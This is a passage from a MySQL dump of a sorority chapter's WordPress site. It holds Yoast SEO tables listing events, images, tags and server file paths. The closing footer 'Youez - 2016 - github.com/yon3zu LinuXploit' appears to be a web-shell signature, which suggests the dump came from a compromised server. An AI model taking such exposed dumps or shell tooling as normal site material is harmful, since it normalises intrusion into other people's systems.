Go','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/11/BOGThumbnail.png',NULL,'1164','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2016/11/BOGThumbnail.png','1164','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2016/11/BOGThumbnail.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2016/11/BOGThumbnail.png\",\"size\":\"full\",\"id\":1164,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(64,'https://zphiblgz.org/author/triggins/','37:f77b39a2ec21e1671a80650d020bf024',8,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/87107f024b4865b3acab18fcd1a6fac5?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/87107f024b4865b3acab18fcd1a6fac5?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(65,'https://zphiblgz.org/?post_type=event&p=1344','44:bddd6c17a1beb22bc34016e092c5a823',1344,'post','event',8,0,NULL,NULL,'Joy Drive','draft',0,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/11/Joydrive_Calendar.png',NULL,'1340','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/11/Joydrive_Calendar.png','1340','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/11/Joydrive_Calendar.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/11/Joydrive_Calendar.png\",\"size\":\"full\",\"id\":1340,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(66,'https://zphiblgz.org/?post_type=event&p=1338','44:43ef98a933acba15cd71711b8e8291c5',1338,'post','event',8,0,NULL,NULL,'Spirit Night','draft',0,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/11/SpiritNight_CalendarImage.png',NULL,'1341','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/11/SpiritNight_CalendarImage.png','1341','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/11/SpiritNight_CalendarImage.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/11/SpiritNight_CalendarImage.png\",\"size\":\"full\",\"id\":1341,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(67,'https://zphiblgz.org/?post_type=event&p=1331','44:abaaae8ba721e3833ad5e0d6c1bfed1b',1331,'post','event',8,0,NULL,NULL,'Voter Registration Drive','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistration_Calendar.png',NULL,'1332','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistration_Calendar.png','1332','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistration_Calendar.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/09/VoterRegistration_Calendar.png\",\"size\":\"full\",\"id\":1332,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(68,'https://zphiblgz.org/?post_type=event&p=1309','44:c9b22ecdb439f96155db85208da3bd38',1309,'post','event',1,0,NULL,NULL,'Nuts and Bolts Workshop Series: Getting Money (Understanding and Applying for Financial Aid)','draft',0,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png',NULL,'1299','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png','1299','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png\",\"size\":\"full\",\"id\":1299,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(69,'https://zphiblgz.org/?post_type=event&p=1298','44:f540e0bf4b448af77459bbf63774ad98',1298,'post','event',1,0,NULL,NULL,'Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','draft',0,0,NULL,NULL,NULL,'College Application',32,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png',NULL,'1299','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png','1299','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png\",\"size\":\"full\",\"id\":1299,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/png\"}',NULL,NULL,NULL,'2021-01-26 14:29:55','2021-01-26 21:29:55',1,NULL,NULL,NULL,NULL,0,NULL),(70,'https://zphiblgz.org/event/above-the-mask-virtual-make-up-tutorial/','67:fe090641930ff56ae781cb0159dc43b9',1431,'post','event',1,0,NULL,NULL,'Above the Mask: Virtual Make-up Tutorial','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg',NULL,'1438','featured-image',NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg','1438','featured-image','{\"width\":200,\"height\":200,\"url\":\"https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg\",\"path\":\"/home2/zphiblgz/public_html/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg\",\"size\":\"full\",\"id\":1438,\"alt\":\"\",\"pixels\":40000,\"type\":\"image/jpeg\"}',1,NULL,NULL,'2021-01-26 14:30:12','2021-01-27 07:03:21',1,NULL,NULL,NULL,NULL,0,NULL),(71,'https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png','72:99e9afe369aa02b2c1d2c28e0f2f1829',1432,'post','attachment',1,1431,NULL,NULL,'Above the Mask flyer','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png',NULL,'1432','attachment-image',NULL,NULL,NULL,'1432','attachment-image',NULL,0,2,NULL,'2021-01-26 14:37:08','2021-01-27 00:03:21',1,NULL,NULL,NULL,NULL,1,NULL),(73,'https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg','102:3610912bc9c7ae46e2e2e1ac7d49f846',1438,'post','attachment',1,1431,NULL,NULL,'140211258_3662888647079788_6327641844132942069_n','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg',NULL,'1438','attachment-image',NULL,NULL,NULL,'1438','attachment-image',NULL,0,NULL,NULL,'2021-01-26 15:07:19','2021-01-26 22:07:19',1,NULL,NULL,NULL,NULL,1,NULL),(74,'https://zphiblgz.org/tag/zphib/','31:3575f53bc8db95b9f3406d912220bd56',107,'term','post_tag',NULL,NULL,NULL,NULL,'zphib',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 15:22:35','2021-01-26 22:22:35',1,NULL,NULL,NULL,NULL,0,NULL),(75,'https://zphiblgz.org/tag/makeup/','32:8eddb5119022162f8dd31678fe0badd5',108,'term','post_tag',NULL,NULL,NULL,NULL,'makeup',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 15:22:35','2021-01-26 22:22:35',1,NULL,NULL,NULL,NULL,0,NULL),(76,'https://zphiblgz.org/tag/glam/','30:5d038e96ca9b160d1d040f6eb3615405',109,'term','post_tag',NULL,NULL,NULL,NULL,'glam',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 15:22:35','2021-01-26 22:22:35',1,NULL,NULL,NULL,NULL,0,NULL),(77,'https://zphiblgz.org/tag/mask/','30:17b0c8b9de0183ca62c5af59a4dcf468',110,'term','post_tag',NULL,NULL,NULL,NULL,'mask',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 15:22:35','2021-01-26 22:22:35',1,NULL,NULL,NULL,NULL,0,NULL),(78,'https://zphiblgz.org/tag/zetaphibeta/','37:b4bf0481a3ed39afa787c7a43ce54055',111,'term','post_tag',NULL,NULL,NULL,NULL,'zetaphibeta',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 15:22:35','2021-01-26 22:22:35',1,NULL,NULL,NULL,NULL,0,NULL),(79,'https://zphiblgz.org/?post_type=event&p=1444','44:15fc7078ca2394ee2b02a42474a4f4b5',1444,'post','event',1,0,NULL,NULL,'','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 23:32:17','2021-01-27 06:32:38',1,NULL,NULL,NULL,NULL,0,1),(81,'https://zphiblgz.org/wp-content/uploads/2021/09/2020-Basileus-LW-left.jpeg','74:19db9d6bd6459598b0f6ecebedb8f0f0',1452,'post','attachment',1,0,NULL,NULL,'2020 Basileus LW left','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/09/2020-Basileus-LW-left.jpeg',NULL,'1452','attachment-image',NULL,NULL,NULL,'1452','attachment-image',NULL,NULL,NULL,NULL,'2021-09-22 14:09:12','2021-09-22 20:09:12',1,NULL,NULL,NULL,NULL,0,NULL),(82,'https://zphiblgz.org/wp-content/uploads/2021/09/lilletsig.png','61:b982a9df13d299f812da356aeefe150b',1453,'post','attachment',1,6,NULL,NULL,'lilletsig','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/09/lilletsig.png',NULL,'1453','attachment-image',NULL,NULL,NULL,'1453','attachment-image',NULL,NULL,NULL,NULL,'2021-09-22 14:24:59','2021-09-22 20:24:59',1,NULL,NULL,NULL,NULL,0,NULL),(83,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-1.png','80:1b3e8c7100932428ff6ed766e97b5c86',1455,'post','attachment',1,0,NULL,NULL,'2021 scholarship recipient 1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-1.png',NULL,'1455','attachment-image',NULL,NULL,NULL,'1455','attachment-image',NULL,NULL,NULL,NULL,'2021-09-22 18:23:21','2021-09-23 00:23:21',1,NULL,NULL,NULL,NULL,0,NULL),(84,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-2.png','80:eb930d3a24ab7d979c227342465442e7',1456,'post','attachment',1,0,NULL,NULL,'2021 scholarship recipient 2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-2.png',NULL,'1456','attachment-image',NULL,NULL,NULL,'1456','attachment-image',NULL,NULL,NULL,NULL,'2021-09-22 18:23:24','2021-09-23 00:23:24',1,NULL,NULL,NULL,NULL,0,NULL);
/*!40000 ALTER TABLE `lwz_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_indexable_hierarchy`
--

DROP TABLE IF EXISTS `lwz_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_indexable_hierarchy` (
  `indexable_id` int(11) unsigned NOT NULL DEFAULT '0',
  `ancestor_id` int(11) unsigned NOT NULL DEFAULT '0',
  `depth` int(11) unsigned DEFAULT NULL,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  PRIMARY KEY (`indexable_id`,`ancestor_id`),
  KEY `indexable_id` (`indexable_id`),
  KEY `ancestor_id` (`ancestor_id`),
  KEY `depth` (`depth`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_indexable_hierarchy`
--

LOCK TABLES `lwz_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_indexable_hierarchy` DISABLE KEYS */;
INSERT INTO `lwz_yoast_indexable_hierarchy` VALUES (2,0,0,1),(4,0,0,1),(5,0,0,1),(6,0,0,1),(7,6,1,1),(8,0,0,1),(9,6,1,1),(10,0,0,1),(11,6,1,1),(13,0,0,1),(16,10,1,1),(28,0,0,1),(37,0,0,1),(38,10,1,1),(44,0,0,1),(49,0,0,1),(71,70,1,1),(73,70,1,1),(81,0,0,1),(82,2,1,1),(83,0,0,1),(84,0,0,1);
/*!40000 ALTER TABLE `lwz_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_migrations`
--

DROP TABLE IF EXISTS `lwz_yoast_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_migrations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `lwz_yoast_migrations_version` (`version`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_migrations`
--

LOCK TABLES `lwz_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_migrations` DISABLE KEYS */;
INSERT INTO `lwz_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200616130143'),(16,'20200617122511'),(17,'20200702141921'),(18,'20200728095334'),(19,'20201202144329'),(20,'20201216124002'),(21,'20201216141134');
/*!40000 ALTER TABLE `lwz_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_primary_term`
--

DROP TABLE IF EXISTS `lwz_yoast_primary_term`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_primary_term` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) DEFAULT NULL,
  `term_id` bigint(20) DEFAULT NULL,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `post_taxonomy` (`post_id`,`taxonomy`),
  KEY `post_term` (`post_id`,`term_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_primary_term`
--

LOCK TABLES `lwz_yoast_primary_term` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_primary_term` DISABLE KEYS */;
INSERT INTO `lwz_yoast_primary_term` VALUES (1,1243,2,'category','2020-09-28 01:14:39','2020-09-28 07:14:39',1),(2,956,2,'category','2020-09-28 01:14:39','2020-09-28 07:14:39',1),(3,1023,68,'cause_categories','2020-09-30 13:26:06','2020-09-30 19:26:06',1),(4,90,68,'cause_categories','2020-09-30 14:04:44','2020-09-30 20:04:44',1),(5,1390,43,'event_categories','2021-01-26 14:29:55','2021-01-27 06:43:49',1),(6,1331,70,'event_categories','2021-01-26 14:29:55','2021-01-26 21:29:55',1),(7,1309,55,'event_categories','2021-01-26 14:29:55','2021-01-26 21:29:55',1),(8,1298,55,'event_categories','2021-01-26 14:29:55','2021-01-26 21:29:55',1),(9,1431,23,'event_categories','2021-01-26 14:52:46','2021-01-27 07:03:21',1);
/*!40000 ALTER TABLE `lwz_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_seo_links`
--

DROP TABLE IF EXISTS `lwz_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `indexable_id` int(11) unsigned DEFAULT NULL,
  `target_indexable_id` int(11) unsigned DEFAULT NULL,
  `height` int(11) unsigned DEFAULT NULL,
  `width` int(11) unsigned DEFAULT NULL,
  `size` int(11) unsigned DEFAULT NULL,
  `language` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`),
  KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=MyISAM AUTO_INCREMENT=146 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_seo_links`
--

LOCK TABLES `lwz_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `lwz_yoast_seo_links` VALUES (145,'',797,0,'internal',10,60,NULL,NULL,NULL,NULL,NULL),(76,'https://zphiblgz.org/zhope/breakfastonthego/',493,772,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(75,'mailto:zhope@zphiblgz.org',1344,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(74,'http://www.paypal.me/zphiblgz',1344,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(116,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png',956,0,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(117,'http://twodigitsgame.com/',956,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(118,'http://www.zphiblgz.org',956,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(119,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf',956,0,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(120,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png',956,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(121,'https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1-300x300.png',1179,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(122,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease-232x300.png',682,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(123,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png',689,0,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(124,'http://www.zphiblgz.org',689,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(125,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf',689,0,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(126,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png',689,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(127,'https://zphiblgz.org/wp-content/uploads/2017/01/LGZScholarshipReleaseForm-pdf-232x300.jpg',1173,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(128,'https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation-300x150.png',841,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(129,'https://zphiblgz.org/wp-content/uploads/2016/12/Membership-300x169.png',576,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(130,'https://zphiblgz.org/wp-content/uploads/2018/05/Chapter-300x200.png',1277,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(131,'https://zphiblgz.org/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n-300x209.jpg',694,0,'image-in',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(143,'https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png',1431,1432,'internal',70,71,NULL,NULL,NULL,NULL,NULL),(144,'https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer-200x300.png',1431,1432,'image-in',70,71,1200,800,1329909,NULL,NULL);
/*!40000 ALTER TABLE `lwz_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_yoast_seo_meta`
--

DROP TABLE IF EXISTS `lwz_yoast_seo_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_yoast_seo_meta`
--

LOCK TABLES `lwz_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `lwz_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `lwz_yoast_seo_meta` VALUES (1093,0,0),(553,0,0),(1115,0,0),(6,0,0),(567,0,0),(1124,0,0),(1129,0,0),(247,0,0),(1133,0,0),(1135,0,0),(190,0,0),(781,0,0),(738,0,0),(772,0,1),(786,0,0),(797,1,0),(804,0,0),(596,0,0),(493,1,0),(1165,0,0),(1170,0,0),(1185,0,0),(1188,0,0),(1195,0,0),(1202,0,0),(1198,0,0),(1209,0,0),(1217,0,0),(1220,0,0),(1222,0,0),(1224,0,0),(1226,0,0),(1228,0,0),(1230,0,0),(1232,0,0),(1234,0,0),(1239,0,0),(1243,0,0),(1249,0,0),(1258,0,0),(485,0,0),(1264,0,0),(1265,0,0),(1263,0,0),(1176,0,0),(1177,0,0),(1266,0,0),(1268,0,0),(1212,0,0),(1020,0,0),(1007,0,0),(1213,0,0),(1275,0,0),(1279,0,0),(657,0,0),(1280,0,0),(1283,0,0),(1211,0,0),(1288,0,0),(1289,0,0),(867,0,0),(868,0,0),(870,0,0),(872,0,0),(874,0,0),(875,0,0),(814,0,0),(815,0,0),(816,0,0),(789,0,0),(981,0,0),(790,0,0),(658,0,0),(791,0,0),(660,0,0),(794,0,0),(661,0,0),(795,0,0),(535,0,0),(548,0,0),(547,0,0),(796,0,0),(662,0,0),(866,0,0),(865,0,0),(862,0,0),(860,0,0),(828,0,0),(825,0,0),(824,0,0),(898,0,0),(823,0,0),(897,0,0),(822,0,0),(821,0,0),(820,0,0),(819,0,0),(818,0,0),(817,0,0),(1084,0,0),(1083,0,0),(888,0,0),(995,0,0),(887,0,0),(886,0,0),(885,0,0),(883,0,0),(882,0,0),(881,0,0),(880,0,0),(878,0,0),(877,0,0),(876,0,0),(1140,0,0),(1139,0,0),(1290,0,0),(1298,0,0),(1309,0,0),(1313,0,0),(1316,0,0),(1325,0,0),(1291,0,0),(1331,0,0),(1328,0,0),(1329,0,0),(1330,0,0),(1197,0,0),(1194,0,0),(1187,0,0),(1282,0,0),(1270,0,0),(1251,0,0),(1253,0,0),(1254,0,0),(1206,0,0),(1295,0,0),(1123,0,0),(1039,0,0),(1040,0,0),(1042,0,0),(1038,0,0),(1117,0,0),(1015,0,0),(1016,0,0),(1013,0,0),(1021,0,0),(1272,0,0),(1296,0,0),(1032,0,0),(1008,0,0),(1009,0,0),(1011,0,0),(1028,0,0),(1031,0,0),(1030,0,0),(1274,0,0),(1219,0,0),(850,0,0),(851,0,0),(602,0,0),(892,0,0),(893,0,0),(601,0,0),(843,0,0),(845,0,0),(847,0,0),(998,0,0),(1001,0,0),(1002,0,0),(1210,0,0),(842,0,0),(896,0,0),(486,0,0),(848,0,0),(857,0,0),(1262,0,0),(597,0,0),(894,0,0),(895,0,0),(854,0,0),(855,0,0),(1161,0,0),(1005,0,0),(1003,0,0),(1260,0,0),(1267,0,0),(1037,0,0),(1046,0,0),(1044,0,0),(1034,0,0),(1127,0,0),(1128,0,0),(1132,0,0),(1238,0,0),(1241,0,0),(1207,0,0),(1338,0,0),(1344,0,0),(1337,0,0),(1346,0,0),(1350,0,0),(1351,0,0),(1171,0,0),(1319,0,0),(1359,0,0),(1356,0,0),(1357,0,0),(1362,0,0),(1363,0,0),(1366,0,0),(1369,0,0),(1361,0,0),(1372,0,0),(1352,0,0),(1377,0,0),(1378,0,0),(1122,0,0),(1383,0,0),(1385,0,0),(1389,0,0),(1390,0,0),(1393,0,0),(1394,0,0),(1391,0,0),(1317,0,0),(1381,0,0),(1368,0,0),(1373,0,0),(1380,0,0),(1371,0,0),(1400,0,0),(1402,0,0),(1105,0,0),(1174,0,0),(1406,0,0),(1405,0,0),(1407,0,0),(1408,0,0),(1409,0,0),(1410,0,0),(1411,0,0),(1412,0,0),(948,0,0),(1320,0,0),(1413,0,0),(1414,0,0),(1403,0,0),(805,0,0),(1172,0,0),(1156,0,0),(1104,0,0),(1106,0,0),(1417,0,0),(1419,0,0),(1420,0,0),(1416,0,0),(1404,0,0),(1427,0,0);
/*!40000 ALTER TABLE `lwz_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2021-09-22 14:33:59

Youez - 2016 - github.com/yon3zu
LinuXploit